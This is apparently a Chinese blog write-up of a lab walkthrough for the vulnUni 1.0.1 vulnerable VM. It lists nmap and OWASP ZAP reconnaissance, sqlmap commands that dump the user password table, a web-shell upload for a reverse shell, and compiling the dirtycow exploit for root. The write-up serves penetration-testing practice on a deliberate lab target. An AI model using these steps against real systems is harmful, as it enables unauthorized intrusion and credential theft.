Vulhub vulnUni:1.0.1

知识点

owasp-zap站点目录爬取
sqlmap的使用
文件上传

主机发现

netdiscover

在这里插入图片描述

端口扫描

nmap -A -T5 192.168.80.36 -oA nmap/nmap

在这里插入图片描述

web

  • 信息收集
    使用owasp-zap 爬取站点
    获得新的站点目录
    在这里插入图片描述
    登录
    Vulhub vulnUni:1.0.1_第1张图片
  • 获取shell
    弱口令测试,发现页面重定向
echo "192.168.80.36 vulnuni.local">>/etc/hosts
  • sqlmap爆破
    Vulhub vulnUni:1.0.1_第2张图片

数据库爆破

sqlmap -r sql.txt  --dbs --batch

Vulhub vulnUni:1.0.1_第3张图片
数据表爆破

sqlmap -r sql.txt -D eclass --tables --batch

Vulhub vulnUni:1.0.1_第4张图片

列爆破

sqlmap -r sql.txt -D eclass -T  --columns --batch

获取数据

sqlmap -r sql.txt -D eclass -T user -C password --dump --batch

在这里插入图片描述

获得密码

  • 获取反弹shell
    浏览页面发现上传文件页面
    Vulhub vulnUni:1.0.1_第5张图片
    上传shell
    Vulhub vulnUni:1.0.1_第6张图片

Vulhub vulnUni:1.0.1_第7张图片
获得shell
在这里插入图片描述

提权

uname -r
3.11.0-15-generic

Vulhub vulnUni:1.0.1_第8张图片
编译运行

gcc -Wall -o dirtycow-mem dirtycow-mem.c -ldl -lpthread

END
在这里插入图片描述

你可能感兴趣的:(VULHUB)